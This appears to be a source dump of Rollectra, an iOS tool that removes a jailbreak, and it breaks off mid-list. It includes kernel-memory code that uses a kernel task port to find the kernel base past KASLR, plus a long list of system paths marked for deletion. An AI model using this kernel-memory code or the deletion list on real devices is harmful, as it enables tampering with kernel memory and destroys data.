__SBSAutolockTimerPostExternalChangeNotification, 246 | __SBSAutolockTimerRegisterForExternalChangeNotification, __SBSRequestPasscodeUnlockUI, 247 | __SBSRestartGetInfoForIdentifier, __SBSRestartLock, 
__SBSRestartScheduleBlockForIdentifier, 248 | __SBSRestartSetInfoForIdentifier, __SBSRestartUnlock, 249 | __SBSWhitelistedUnarchiveFromDataWithAllowedClasses, ___SBSEventObserverGetDarwinNotificationFromEvent, 250 | ___sb__mainScreenReferenceBounds, ___sb__runningInSpringBoard, _kSBCarPlayDefaultColumnCount, 251 | _kSBCarPlayDefaultRowCount, _kSBCarPlayDisplaysOEMIcon, _kSBCarPlayHiddenIconKey, 252 | _kSBCarPlayIconOrderKey, _kSBCarPlayMaxColumnsKey, _kSBCarPlayMaxRowsKey, _kSBCarPlayOEMIconLabel, 253 | _kSBCarPlayScreenBoundsKey, _kSBSAlertNotificationCenterName, _kSBSAlertNotificationDate, 254 | _kSBSAlertNotificationSender, _kSBSAlertNotificationType, _kSBSAlertPresentedNotificationName, 255 | _kSBSAnalyticsBreadcrumbTappedKey, _kSBSAnalyticsDeleteIconLocationKey, 256 | _kSBSAnalyticsDeleteIconOptionsKey, _kSBSAnalyticsDeleteIconSelectedOptionKey, 257 | _kSBSAnalyticsDisplayLayoutElementBundleIdKey, _kSBSAnalyticsDisplayLayoutElementIdentifierKey, 258 | _kSBSAnalyticsDisplayLayoutElementLevelKey, _kSBSAnalyticsDisplayLayoutElementUIApplicationKey, 259 | _kSBSAnalyticsDisplayLayoutElementsKey, _kSBSAnalyticsDockSuggestionIndexKey, 260 | _kSBSAnalyticsDockSuggestionTypeKey, _kSBSAnalyticsDockSuggestionsEnabledKey, 261 | _kSBSAnalyticsDockSwipeGestureStateKey, _kSBSAnalyticsEventTypeSpringloadedLocationKey, 262 | _kSBSAnalyticsFloatingApplicationMoveGestureInitialConfigurationKey, 263 | _kSBSAnalyticsFloatingApplicationMoveGestureResultConfigurationKey, 264 | _kSBSAnalyticsFloatingApplicationPinGestureDidSwipeDownKey, 265 | _kSBSAnalyticsFloatingApplicationPinGesturePinActionTypeKey, _kSBSAnalyticsFluidGestureFinalActionKey, 266 | _kSBSAnalyticsFluidGestureTypeKey, _kSBSAnalyticsFolderStatsNumberOfFoldersInDockKey, 267 | _kSBSAnalyticsFolderStatsNumberOfFoldersKey, _kSBSAnalyticsFolderStatsNumberOfItemsInDockKey, 268 | _kSBSAnalyticsFolderStatsNumberOfPagesKey, 269 | _kSBSAnalyticsIconDragSessionDroppedToMedusaDragStartLocationKey, 270 | 
_kSBSAnalyticsIconDragSessionDroppedToMedusaDropActionKey, _kSBSAnalyticsIconDragSessionIdentifierKey, 271 | _kSBSAnalyticsIconDragSessionItemCountKey, _kSBSAnalyticsIconIndexKey, _kSBSAnalyticsIconIsFolderKey, 272 | _kSBSAnalyticsIconLocationKey, _kSBSAnalyticsLayoutStateElementIdentifiersKey, 273 | _kSBSAnalyticsLayoutStateElementInterfaceOrientationKey, 274 | _kSBSAnalyticsLayoutStateFloatingConfigurationKey, _kSBSAnalyticsLayoutStateInterfaceOrientationKey, 275 | _kSBSAnalyticsLayoutStateSpaceConfigurationKey, _kSBSAnalyticsLayoutStateTransitionSourceKey, 276 | _kSBSAnalyticsLayoutStateUnlockedEnvironmentKey, _kSBSAnalyticsLeftBreadcrumbTypeKey, 277 | _kSBSAnalyticsPIPVideoDidActivateKey, _kSBSAnalyticsReachabilityCancelGestureTypeKey, 278 | _kSBSAnalyticsRightBreadcrumbTypeKey, _kSBSAnalyticsSideApplicationMoveGestureInitialConfigurationKey, 279 | _kSBSAnalyticsSideApplicationMoveGestureResultConfigurationKey, _kSBSAnalyticsSwipeUpFinalActionKey, 280 | _kSBSAnalyticsSwipeUpLiftOffVelocityAngleKey, _kSBSAnalyticsSwipeUpLiftOffVelocityXKey, 281 | _kSBSAnalyticsSwipeUpLiftOffVelocityYKey, _kSBSAnalyticsSwipeUpOrientationKey, 282 | _kSBSAnalyticsSwipeUpPeakVelocityKey, _kSBSAnalyticsSwipeUpTimestampDeltaKey, 283 | _kSBSAnalyticsSwipeUpXCoordKey, _kSBSAnalyticsSwipeUpYCoordKey, _kSBSAnalyticsSwitcherIndexKey, 284 | _kSBSAnalyticsSwitcherTypeKey, _kSBSAnalyticsSystemGestureStateKey, _kSBSAnalyticsSystemGestureTypeKey, 285 | _kSBSAnalyticsTimestampKey, _kSBSApplicationBiometricsServiceMessageKeyCredentialSet, 286 | _kSBSApplicationCarPlayServiceClientMessageKeyHiddenIcons, 287 | _kSBSApplicationCarPlayServiceClientMessageKeyVehicleIdentifier, 288 | _kSBSApplicationCarPlayServiceMessageKeyIconState, 289 | _kSBSApplicationCarPlayServiceServerMessageKeyDisplayName, 290 | _kSBSApplicationCarPlayServiceServerMessageKeyIconImage, 291 | _kSBSApplicationCarPlayServiceServerMessageKeyIconImageScale, 292 | _kSBSApplicationHarmonyServiceClientMessageKeyDisplayId, 293 | 
_kSBSApplicationHarmonyServiceServerMessageKeyWhitePointAdaptivityStyle, 294 | _kSBSApplicationServiceMessageKeyBundleIdentifier, _kSBSApplicationShortcutContactIconFirstNameKey, 295 | _kSBSApplicationShortcutContactIconIdentifierKey, _kSBSApplicationShortcutContactIconImageDataKey, 296 | _kSBSApplicationShortcutContactIconLastNameKey, _kSBSApplicationShortcutItemTypeSendBetaFeedback, 297 | _kSBSApplicationShortcutItemTypeSendBetaFeedbackUserInfoItemIDKey, 298 | _kSBSApplicationShortcutServiceClientMessageKeyDynamicApplicationShortcutItems, 299 | _kSBSApplicationShortcutServiceClientMessageKeyItemTypes, 300 | _kSBSApplicationShortcutServiceFetchResultDynamicApplicationShortcutItemsKey, 301 | _kSBSApplicationShortcutServiceFetchResultStaticApplicationShortcutItemsKey, 302 | _kSBSApplicationShortcutServiceServerMessageKeyResult, _kSBSApplicationShortcutSystemIconTypeKey, 303 | _kSBSApplicationShortcutTemplateIconNameKey, _kSBSCardItemBodyKey, _kSBSCardItemBundleName, 304 | _kSBSCardItemCategoryIdentifierKey, _kSBSCardItemIconDataKey, _kSBSCardItemIdentifierKey, 305 | _kSBSCardItemRequiresPasscodeKey, _kSBSCardItemSubtitleKey, _kSBSCardItemTitleKey, 306 | _kSBSCardItemUserInfoKey, _kSBSHardwareButtonServiceMessageKeyButtonKind, 307 | _kSBSHardwareButtonServiceMessageKeyEventMask, _kSBSHardwareButtonServiceMessageKeyEventType, 308 | _kSBSHardwareButtonServiceMessageKeyHapticType, _kSBSHardwareButtonServiceMessageKeyPriority, 309 | _kSBSLockStateNotifyKey, _kSBSRemoteAlertServiceClientMessageKeyActivationContext, 310 | _kSBSRemoteAlertServiceClientMessageKeyConfigurationContext, 311 | _kSBSRemoteAlertServiceClientMessageKeyCreateIfNone, _kSBSRemoteAlertServiceClientMessageKeyDefinition, 312 | _kSBSRemoteAlertServiceClientMessageKeyRemoteAlertToken, _kSBSRemoteAlertServiceMessageKeyHandleToken, 313 | _kSBSRemoteAlertServiceServerMessageKeyActive, _kSBSRemoteAlertServiceServerMessageKeyHandleInfos, 314 | _kSBSRemoteAlertServiceServerMessageKeyInvalidationReason, 315 | 
_kSBSRemoteAlertServiceServerMessageKeyInvalidationUnderlyingError, 316 | _kSBSStatusBarStyleOverridesAssertionExclusiveKey, _kSBSStatusBarStyleOverridesAssertionOverridesKey, 317 | _kSBSStatusBarStyleOverridesAssertionPIDKey, 318 | _kSBSStatusBarStyleOverridesAssertionShowsWhenForegroundKey, 319 | _kSBSStatusBarStyleOverridesAssertionStatusStringKey, 320 | _kSBSStatusBarStyleOverridesAssertionUniqueIdentifierKey, _kSBSStatusBarTapContextStyleOverrideKey, 321 | _kSBSSystemBiometricsServiceMessageKeyCredentialSet, 322 | _kSBSSystemHardwareButtonServiceClientMessageKeyAssertionReason, 323 | _kSBSSystemHardwareButtonServiceClientMessageKeyAssertionType, 324 | _kSBSSystemHardwareButtonServiceServerMessageKeyAction, _kSBSWallpaperServiceClientMessageKeyImageData, 325 | _kSBSWallpaperServiceClientMessageKeyVariant, _kSBUserDoneWithRequestedPasscodeUINotification, 326 | _secureAppTypeName ] 327 | objc-classes: [ _SBSAbstractApplicationService, _SBSAbstractFacilityService, _SBSAbstractSystemService, 328 | _SBSAccelerometer, _SBSAcquireAssertionAction, _SBSAnalyticsState, _SBSAppDragLocalContext, 329 | _SBSApplicationCarPlayService, _SBSApplicationClient, _SBSApplicationHarmonyService, 330 | _SBSApplicationRemovabilityService, _SBSApplicationShortcutContactIcon, 331 | _SBSApplicationShortcutCustomImageIcon, _SBSApplicationShortcutIcon, _SBSApplicationShortcutItem, 332 | _SBSApplicationShortcutService, _SBSApplicationShortcutServiceFetchResult, 333 | _SBSApplicationShortcutSystemIcon, _SBSApplicationShortcutTemplateIcon, _SBSAssertion, 334 | _SBSBiometricsService, _SBSCardItem, _SBSCardItemsController, _SBSDisplayLayoutElement, 335 | _SBSHardwareButtonService, _SBSLockScreenPluginService, _SBSRelaunchAction, 336 | _SBSRemoteAlertActivationContext, _SBSRemoteAlertActivationOptions, _SBSRemoteAlertClient, 337 | _SBSRemoteAlertConfiguration, _SBSRemoteAlertConfigurationContext, _SBSRemoteAlertDefinition, 338 | _SBSRemoteAlertHandle, _SBSSecureAppAction, _SBSSecureAppAssertion, 
_SBSServiceFacilityClient, 339 | _SBSStatusBarStyleOverridesAssertion, _SBSStatusBarStyleOverridesAssertionData, 340 | _SBSStatusBarStyleOverridesAssertionManager, _SBSStatusBarStyleOverridesCoordinator, 341 | _SBSStatusBarTapContextImpl, _SBSSystemServiceClient, _SBSWallpaperClient, _SBSWallpaperService, 342 | _SBScreenTimeTrackingController, _SBSpringBoardDiedDeactivationHandler, __SBSCarPlayApplicationInfo, 343 | __SBSDisplayIdentifiersCache, __SBSHardwareButtonEventConsumerInfo ] 344 | objc-ivars: [ _SBSAbstractFacilityService._client, _SBSAccelerometer._bksMirror, _SBSAccelerometer._delegate, 345 | _SBSAnalyticsState._payload, _SBSAnalyticsState._timestamp, 346 | _SBSAppDragLocalContext._applicationBundleIdentifier, _SBSAppDragLocalContext._cancelsViaScaleAndFade, 347 | _SBSAppDragLocalContext._launchActions, _SBSAppDragLocalContext._launchURL, 348 | _SBSAppDragLocalContext._portaledPreview, _SBSAppDragLocalContext._startLocation, 349 | _SBSApplicationShortcutContactIcon._contactIdentifier, _SBSApplicationShortcutContactIcon._firstName, 350 | _SBSApplicationShortcutContactIcon._imageData, _SBSApplicationShortcutContactIcon._lastName, 351 | _SBSApplicationShortcutCustomImageIcon._dataType, _SBSApplicationShortcutCustomImageIcon._imageData, 352 | _SBSApplicationShortcutCustomImageIcon._isTemplate, _SBSApplicationShortcutItem._activationMode, 353 | _SBSApplicationShortcutItem._bundleIdentifierToLaunch, _SBSApplicationShortcutItem._icon, 354 | _SBSApplicationShortcutItem._localizedSubtitle, _SBSApplicationShortcutItem._localizedTitle, 355 | _SBSApplicationShortcutItem._type, _SBSApplicationShortcutItem._userInfoData, 356 | _SBSApplicationShortcutServiceFetchResult._dynamicApplicationShortcutItems, 357 | _SBSApplicationShortcutServiceFetchResult._staticApplicationShortcutItems, 358 | _SBSApplicationShortcutSystemIcon._type, _SBSApplicationShortcutTemplateIcon._templateImageName, 359 | _SBSAssertion._assertionName, _SBSAssertion._lock, _SBSAssertion._port, 
_SBSAssertion._reason, 360 | _SBSCardItem._body, _SBSCardItem._bundleName, _SBSCardItem._categoryIdentifier, _SBSCardItem._iconData, 361 | _SBSCardItem._identifier, _SBSCardItem._requiresPasscode, _SBSCardItem._subtitle, 362 | _SBSCardItem._thumbnail, _SBSCardItem._title, _SBSCardItem._userInfo, 363 | _SBSCardItemsController._connected, _SBSCardItemsController._connection, 364 | _SBSCardItemsController._identifier, _SBSHardwareButtonService._consumers, 365 | _SBSHardwareButtonService._homeButtonConfiguration, _SBSHardwareButtonService._lockButtonConfiguration, 366 | _SBSRemoteAlertActivationContext._actions, _SBSRemoteAlertActivationContext._settings, 367 | _SBSRemoteAlertClient._handleObserverQueue, _SBSRemoteAlertClient._portToDeathSentinelMap, 368 | _SBSRemoteAlertClient._portToHandleMap, _SBSRemoteAlertClient._queue, 369 | _SBSRemoteAlertConfigurationContext._actions, _SBSRemoteAlertConfigurationContext._userInfo, 370 | _SBSRemoteAlertConfigurationContext._xpcEndpoint, _SBSRemoteAlertDefinition._forCarPlay, 371 | _SBSRemoteAlertDefinition._impersonatedCarPlayAppIdentifier, _SBSRemoteAlertDefinition._serviceName, 372 | _SBSRemoteAlertDefinition._userInfo, _SBSRemoteAlertDefinition._vcClassName, 373 | _SBSRemoteAlertHandle._active, _SBSRemoteAlertHandle._client, _SBSRemoteAlertHandle._observers, 374 | _SBSRemoteAlertHandle._queue, _SBSRemoteAlertHandle._token, _SBSSecureAppAssertion._actualAssertion, 375 | _SBSSecureAppAssertion._errorHandler, _SBSServiceFacilityClient._numberOfCheckOuts, 376 | _SBSStatusBarStyleOverridesAssertion._assertionData, 377 | _SBSStatusBarStyleOverridesAssertion._invalidationHandler, 378 | _SBSStatusBarStyleOverridesAssertionData._exclusive, _SBSStatusBarStyleOverridesAssertionData._pid, 379 | _SBSStatusBarStyleOverridesAssertionData._showsWhenForeground, 380 | _SBSStatusBarStyleOverridesAssertionData._statusBarStyleOverrides, 381 | _SBSStatusBarStyleOverridesAssertionData._statusString, 382 | 
_SBSStatusBarStyleOverridesAssertionData._uniqueIdentifier, 383 | _SBSStatusBarStyleOverridesAssertionManager._assertionsByIdentifier, 384 | _SBSStatusBarStyleOverridesAssertionManager._coordinatorCalloutQueue, 385 | _SBSStatusBarStyleOverridesAssertionManager._internalQueue, 386 | _SBSStatusBarStyleOverridesAssertionManager._internalQueue_styleOverrideCoordinator, 387 | _SBSStatusBarStyleOverridesAssertionManager._sbXPCConnection, 388 | _SBSStatusBarStyleOverridesCoordinator._delegate, 389 | _SBSStatusBarStyleOverridesCoordinator._styleOverrides, _SBSStatusBarTapContextImpl._styleOverride, 390 | _SBSSystemServiceClient._buttonEventServiceIsWaitingForServerMessages, 391 | _SBSWallpaperService._callbackQueue, _SBSWallpaperService._client, 392 | _SBSWallpaperService._wasInvalidated, _SBScreenTimeTrackingController._layoutMonitor, 393 | _SBScreenTimeTrackingController._queue, _SBScreenTimeTrackingController._queue_activeCategory, 394 | _SBScreenTimeTrackingController._queue_activeContext, 395 | _SBScreenTimeTrackingController._queue_isPhoneOrFaceTimeActive, 396 | _SBScreenTimeTrackingController._queue_isScreenOn, 397 | _SBScreenTimeTrackingController._queue_lastCategoryChangeTime, 398 | _SBScreenTimeTrackingController._queue_lastLayout, 399 | _SBScreenTimeTrackingController._queue_lastLayoutTransitionContext, 400 | _SBScreenTimeTrackingController._queue_thisCategoryStartTime, 401 | _SBSpringBoardDiedDeactivationHandler._handlerBlockArray, _SBSpringBoardDiedDeactivationHandler._lock, 402 | _SBSpringBoardDiedDeactivationHandler._portDeathSentinel, __SBSCarPlayApplicationInfo._iconImageData, 403 | __SBSCarPlayApplicationInfo._iconImageScale, __SBSCarPlayApplicationInfo._localizedDisplayName, 404 | __SBSDisplayIdentifiersCache._changedBlock, __SBSDisplayIdentifiersCache._changedToken, 405 | __SBSDisplayIdentifiersCache._displayIdentifiers, __SBSDisplayIdentifiersCache._queue, 406 | __SBSHardwareButtonEventConsumerInfo._buttonKind, 
__SBSHardwareButtonEventConsumerInfo._consumer, 407 | __SBSHardwareButtonEventConsumerInfo._eventMask, __SBSHardwareButtonEventConsumerInfo._eventPriority, 408 | __SBSHardwareButtonEventConsumerInfo._service, __SBSHardwareButtonEventConsumerInfo._valid ] 409 | ... 410 | -------------------------------------------------------------------------------- /Rollectra/ViewController.h: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.h 3 | // Rollectra 4 | // 5 | // Created by pwn20wnd on 8/29/18. 6 | // Copyright © 2018 Pwn20wnd. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface ViewController : UIViewController 12 | @property (weak, nonatomic) IBOutlet UIButton *unjailbreakButton; 13 | @property (weak, nonatomic) IBOutlet UILabel *infoLabel; 14 | @property (weak, nonatomic) IBOutlet UIButton *myButton; 15 | @property (weak, nonatomic) IBOutlet UIButton *aesign_Button; 16 | @property (weak, nonatomic) IBOutlet UISwitch *resetUserDataSwitch; 17 | @property (weak, nonatomic) IBOutlet UILabel *QiLinLabel; 18 | 19 | @end 20 | 21 | -------------------------------------------------------------------------------- /Rollectra/ViewController.m: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.m 3 | // Rollectra 4 | // 5 | // Created by pwn20wnd on 8/29/18. 6 | // Copyright © 2018 Pwn20wnd. All rights reserved. 
7 | // 8 | 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #import "ViewController.h" 15 | #include "common.h" 16 | #ifndef WANT_CYDIA 17 | #include "offsets.h" 18 | #include "sploit.h" 19 | #include "kmem.h" 20 | #endif /* WANT_CYDIA */ 21 | #include "QiLin.h" 22 | #include "iokit.h" 23 | 24 | @interface ViewController () 25 | 26 | @end 27 | 28 | @implementation ViewController 29 | 30 | #ifndef WANT_CYDIA 31 | 32 | // https://github.com/JonathanSeals/kernelversionhacker/blob/3dcbf59f316047a34737f393ff946175164bf03f/kernelversionhacker.c#L92 33 | 34 | #define IMAGE_OFFSET 0x2000 35 | #define MACHO_HEADER_MAGIC 0xfeedfacf 36 | #define MAX_KASLR_SLIDE 0x21000000 37 | #define KERNEL_SEARCH_ADDRESS_IOS10 0xfffffff007004000 38 | 39 | #define ptrSize sizeof(uintptr_t) 40 | 41 | static vm_address_t get_kernel_base(mach_port_t tfp0) { 42 | uint64_t addr = 0; 43 | addr = KERNEL_SEARCH_ADDRESS_IOS10+MAX_KASLR_SLIDE; 44 | 45 | while (1) { 46 | char *buf; 47 | mach_msg_type_number_t sz = 0; 48 | kern_return_t ret = vm_read(tfp0, addr, 0x200, (vm_offset_t*)&buf, &sz); 49 | 50 | if (ret) { 51 | goto next; 52 | } 53 | 54 | if (*((uint32_t *)buf) == MACHO_HEADER_MAGIC) { 55 | int ret = vm_read(tfp0, addr, 0x1000, (vm_offset_t*)&buf, &sz); 56 | if (ret != KERN_SUCCESS) { 57 | printf("Failed vm_read %i\n", ret); 58 | goto next; 59 | } 60 | 61 | for (uintptr_t i=addr; i < (addr+0x2000); i+=(ptrSize)) { 62 | mach_msg_type_number_t sz; 63 | int ret = vm_read(tfp0, i, 0x120, (vm_offset_t*)&buf, &sz); 64 | 65 | if (ret != KERN_SUCCESS) { 66 | printf("Failed vm_read %i\n", ret); 67 | exit(-1); 68 | } 69 | if (!strcmp(buf, "__text") && !strcmp(buf+0x10, "__PRELINK_TEXT")) { 70 | return addr; 71 | } 72 | } 73 | } 74 | 75 | next: 76 | addr -= 0x200000; 77 | } 78 | } 79 | #endif /* WANT_CYDIA */ 80 | 81 | int sha1_to_str(const unsigned char *hash, int hashlen, char *buf, size_t buflen) 82 | { 83 | if (buflen < (hashlen*2+1)) { 84 | return -1; 85 | } 86 | 87 | int i; 
88 | for (i=0; i0) { 162 | char *bufref = buf; 163 | 164 | for (int i=0; ireturned.commonattr & ATTR_CMN_NAME) { 167 | printf("%s\n", (char*)(&entry->name_info) + entry->name_info.attr_dataoffset); 168 | if (strstr((char*)(&entry->name_info) + entry->name_info.attr_dataoffset, name)) 169 | return 1; 170 | } 171 | bufref += entry->length; 172 | } 173 | } 174 | free(buf); 175 | close(fd); 176 | 177 | if (retcount < 0) { 178 | perror("fs_snapshot_list"); 179 | return -1; 180 | } 181 | 182 | return 0; 183 | } 184 | 185 | // https://github.com/tihmstar/doubleH3lix/blob/4428c660832e98271f5d82f7a9c67e842b814621/doubleH3lix/jailbreak.mm#L645 186 | 187 | extern char* const* environ; 188 | int easyPosixSpawn(NSURL *launchPath,NSArray *arguments) { 189 | NSMutableArray *posixSpawnArguments=[arguments mutableCopy]; 190 | [posixSpawnArguments insertObject:[launchPath lastPathComponent] atIndex:0]; 191 | 192 | int argc=(int)posixSpawnArguments.count+1; 193 | printf("Number of posix_spawn arguments: %d\n",argc); 194 | char **args=(char**)calloc(argc,sizeof(char *)); 195 | 196 | for (int i=0; i= 100 || rv == 0); i++) { 225 | usleep(100000); 226 | rv = access(filename, F_OK); 227 | } 228 | return rv; 229 | } 230 | 231 | NSArray *getCleanUpFileList() { 232 | NSMutableArray *array = nil; 233 | array = [[NSMutableArray alloc] init]; 234 | // Electra 235 | [array addObject:@"/electra"]; 236 | [array addObject:@"/usr/lib/libjailbreak.dylib"]; 237 | [array addObject:@"/private/var/mobile/test.txt"]; 238 | [array addObject:@"/.bit_of_fun"]; 239 | [array addObject:@"/.amfid_success"]; 240 | [array addObject:@"/.bootstrapped_electra"]; 241 | // Electra Bootstrap 242 | [array addObject:@"/Applications/Cydia.app"]; 243 | [array addObject:@"/bin/bash"]; 244 | [array addObject:@"/bin/bunzip2"]; 245 | [array addObject:@"/bin/bzcat"]; 246 | [array addObject:@"/bin/bzip2"]; 247 | [array addObject:@"/bin/bzip2recover"]; 248 | [array addObject:@"/bin/cat"]; 249 | [array addObject:@"/bin/chgrp"]; 250 
| [array addObject:@"/bin/chmod"]; 251 | [array addObject:@"/bin/chown"]; 252 | [array addObject:@"/bin/cp"]; 253 | [array addObject:@"/bin/date"]; 254 | [array addObject:@"/bin/dd"]; 255 | [array addObject:@"/bin/dir"]; 256 | [array addObject:@"/bin/echo"]; 257 | [array addObject:@"/bin/egrep"]; 258 | [array addObject:@"/bin/false"]; 259 | [array addObject:@"/bin/fgrep"]; 260 | [array addObject:@"/bin/grep"]; 261 | [array addObject:@"/bin/gtar"]; 262 | [array addObject:@"/bin/gunzip"]; 263 | [array addObject:@"/bin/gzexe"]; 264 | [array addObject:@"/bin/gzip"]; 265 | [array addObject:@"/bin/kill"]; 266 | [array addObject:@"/bin/ln"]; 267 | [array addObject:@"/bin/ls"]; 268 | [array addObject:@"/bin/mkdir"]; 269 | [array addObject:@"/bin/mknod"]; 270 | [array addObject:@"/bin/mktemp"]; 271 | [array addObject:@"/bin/mv"]; 272 | [array addObject:@"/bin/pwd"]; 273 | [array addObject:@"/bin/readlink"]; 274 | [array addObject:@"/bin/rm"]; 275 | [array addObject:@"/bin/rmdir"]; 276 | [array addObject:@"/bin/run-parts"]; 277 | [array addObject:@"/bin/sed"]; 278 | [array addObject:@"/bin/sh"]; 279 | [array addObject:@"/bin/sleep"]; 280 | [array addObject:@"/bin/stty"]; 281 | [array addObject:@"/bin/su"]; 282 | [array addObject:@"/bin/sync"]; 283 | [array addObject:@"/bin/tar"]; 284 | [array addObject:@"/bin/touch"]; 285 | [array addObject:@"/bin/true"]; 286 | [array addObject:@"/bin/uname"]; 287 | [array addObject:@"/bin/uncompress"]; 288 | [array addObject:@"/bin/vdir"]; 289 | [array addObject:@"/bin/zcat"]; 290 | [array addObject:@"/bin/zcmp"]; 291 | [array addObject:@"/bin/zdiff"]; 292 | [array addObject:@"/bin/zegrep"]; 293 | [array addObject:@"/bin/zfgrep"]; 294 | [array addObject:@"/bin/zforce"]; 295 | [array addObject:@"/bin/zgrep"]; 296 | [array addObject:@"/bin/zless"]; 297 | [array addObject:@"/bin/zmore"]; 298 | [array addObject:@"/bin/znew"]; 299 | [array addObject:@"/boot"]; 300 | [array addObject:@"/lib"]; 301 | [array addObject:@"/Library/dpkg"]; 302 | 
[array addObject:@"/Library/LaunchDaemons"]; 303 | [array addObject:@"/mnt"]; 304 | [array addObject:@"/private/etc/alternatives"]; 305 | [array addObject:@"/private/etc/apt"]; 306 | [array addObject:@"/private/etc/default"]; 307 | [array addObject:@"/private/etc/dpkg"]; 308 | [array addObject:@"/private/etc/profile"]; 309 | [array addObject:@"/private/etc/profile.d"]; 310 | [array addObject:@"/private/etc/ssh"]; 311 | [array addObject:@"/private/etc/ssl"]; 312 | [array addObject:@"/private/var/backups"]; 313 | [array addObject:@"/private/var/cache"]; 314 | [array addObject:@"/private/var/empty"]; 315 | [array addObject:@"/private/var/lib"]; 316 | [array addObject:@"/private/var/local"]; 317 | [array addObject:@"/private/var/lock"]; 318 | [array addObject:@"/private/var/log/apt"]; 319 | [array addObject:@"/private/var/spool"]; 320 | [array addObject:@"/sbin/dmesg"]; 321 | [array addObject:@"/sbin/dynamic_pager"]; 322 | [array addObject:@"/sbin/halt"]; 323 | [array addObject:@"/sbin/nologin"]; 324 | [array addObject:@"/sbin/reboot"]; 325 | [array addObject:@"/sbin/update_dyld_shared_cache"]; 326 | [array addObject:@"/usr/bin/apt-key"]; 327 | [array addObject:@"/usr/bin/arch"]; 328 | [array addObject:@"/usr/bin/bashbug"]; 329 | [array addObject:@"/usr/bin/c_rehash"]; 330 | [array addObject:@"/usr/bin/captoinfo"]; 331 | [array addObject:@"/usr/bin/cfversion"]; 332 | [array addObject:@"/usr/bin/clear"]; 333 | [array addObject:@"/usr/bin/cmp"]; 334 | [array addObject:@"/usr/bin/db_archive"]; 335 | [array addObject:@"/usr/bin/db_checkpoint"]; 336 | [array addObject:@"/usr/bin/db_deadlock"]; 337 | [array addObject:@"/usr/bin/db_dump"]; 338 | [array addObject:@"/usr/bin/db_hotbackup"]; 339 | [array addObject:@"/usr/bin/db_load"]; 340 | [array addObject:@"/usr/bin/db_log_verify"]; 341 | [array addObject:@"/usr/bin/db_printlog"]; 342 | [array addObject:@"/usr/bin/db_recover"]; 343 | [array addObject:@"/usr/bin/db_replicate"]; 344 | [array 
addObject:@"/usr/bin/db_sql_codegen"]; 345 | [array addObject:@"/usr/bin/db_stat"]; 346 | [array addObject:@"/usr/bin/db_tuner"]; 347 | [array addObject:@"/usr/bin/db_upgrade"]; 348 | [array addObject:@"/usr/bin/db_verify"]; 349 | [array addObject:@"/usr/bin/dbsql"]; 350 | [array addObject:@"/usr/bin/df"]; 351 | [array addObject:@"/usr/bin/diff"]; 352 | [array addObject:@"/usr/bin/diff3"]; 353 | [array addObject:@"/usr/bin/dirname"]; 354 | [array addObject:@"/usr/bin/dpkg"]; 355 | [array addObject:@"/usr/bin/dpkg-architecture"]; 356 | [array addObject:@"/usr/bin/dpkg-buildflags"]; 357 | [array addObject:@"/usr/bin/dpkg-buildpackage"]; 358 | [array addObject:@"/usr/bin/dpkg-checkbuilddeps"]; 359 | [array addObject:@"/usr/bin/dpkg-deb"]; 360 | [array addObject:@"/usr/bin/dpkg-distaddfile"]; 361 | [array addObject:@"/usr/bin/dpkg-divert"]; 362 | [array addObject:@"/usr/bin/dpkg-genbuildinfo"]; 363 | [array addObject:@"/usr/bin/dpkg-genchanges"]; 364 | [array addObject:@"/usr/bin/dpkg-gencontrol"]; 365 | [array addObject:@"/usr/bin/dpkg-gensymbols"]; 366 | [array addObject:@"/usr/bin/dpkg-maintscript-helper"]; 367 | [array addObject:@"/usr/bin/dpkg-mergechangelogs"]; 368 | [array addObject:@"/usr/bin/dpkg-name"]; 369 | [array addObject:@"/usr/bin/dpkg-parsechangelog"]; 370 | [array addObject:@"/usr/bin/dpkg-query"]; 371 | [array addObject:@"/usr/bin/dpkg-scanpackages"]; 372 | [array addObject:@"/usr/bin/dpkg-scansources"]; 373 | [array addObject:@"/usr/bin/dpkg-shlibdeps"]; 374 | [array addObject:@"/usr/bin/dpkg-source"]; 375 | [array addObject:@"/usr/bin/dpkg-split"]; 376 | [array addObject:@"/usr/bin/dpkg-statoverride"]; 377 | [array addObject:@"/usr/bin/dpkg-trigger"]; 378 | [array addObject:@"/usr/bin/dpkg-vendor"]; 379 | [array addObject:@"/usr/bin/find"]; 380 | [array addObject:@"/usr/bin/getconf"]; 381 | [array addObject:@"/usr/bin/getty"]; 382 | [array addObject:@"/usr/bin/gpg"]; 383 | [array addObject:@"/usr/bin/gpg-zip"]; 384 | [array 
addObject:@"/usr/bin/gpgsplit"]; 385 | [array addObject:@"/usr/bin/gpgv"]; 386 | [array addObject:@"/usr/bin/gssc"]; 387 | [array addObject:@"/usr/bin/hostinfo"]; 388 | [array addObject:@"/usr/bin/infocmp"]; 389 | [array addObject:@"/usr/bin/infotocap"]; 390 | [array addObject:@"/usr/bin/iomfsetgamma"]; 391 | [array addObject:@"/usr/bin/killall"]; 392 | [array addObject:@"/usr/bin/ldrestart"]; 393 | [array addObject:@"/usr/bin/locate"]; 394 | [array addObject:@"/usr/bin/login"]; 395 | [array addObject:@"/usr/bin/lzcat"]; 396 | [array addObject:@"/usr/bin/lzcmp"]; 397 | [array addObject:@"/usr/bin/lzdiff"]; 398 | [array addObject:@"/usr/bin/lzegrep"]; 399 | [array addObject:@"/usr/bin/lzfgrep"]; 400 | [array addObject:@"/usr/bin/lzgrep"]; 401 | [array addObject:@"/usr/bin/lzless"]; 402 | [array addObject:@"/usr/bin/lzma"]; 403 | [array addObject:@"/usr/bin/lzmadec"]; 404 | [array addObject:@"/usr/bin/lzmainfo"]; 405 | [array addObject:@"/usr/bin/lzmore"]; 406 | [array addObject:@"/usr/bin/ncurses6-config"]; 407 | [array addObject:@"/usr/bin/ncursesw6-config"]; 408 | [array addObject:@"/usr/bin/openssl"]; 409 | [array addObject:@"/usr/bin/pagesize"]; 410 | [array addObject:@"/usr/bin/passwd"]; 411 | [array addObject:@"/usr/bin/renice"]; 412 | [array addObject:@"/usr/bin/reset"]; 413 | [array addObject:@"/usr/bin/sbdidlaunch"]; 414 | [array addObject:@"/usr/bin/sbreload"]; 415 | [array addObject:@"/usr/bin/scp"]; 416 | [array addObject:@"/usr/bin/script"]; 417 | [array addObject:@"/usr/bin/sdiff"]; 418 | [array addObject:@"/usr/bin/sftp"]; 419 | [array addObject:@"/usr/bin/sort"]; 420 | [array addObject:@"/usr/bin/ssh"]; 421 | [array addObject:@"/usr/bin/ssh-add"]; 422 | [array 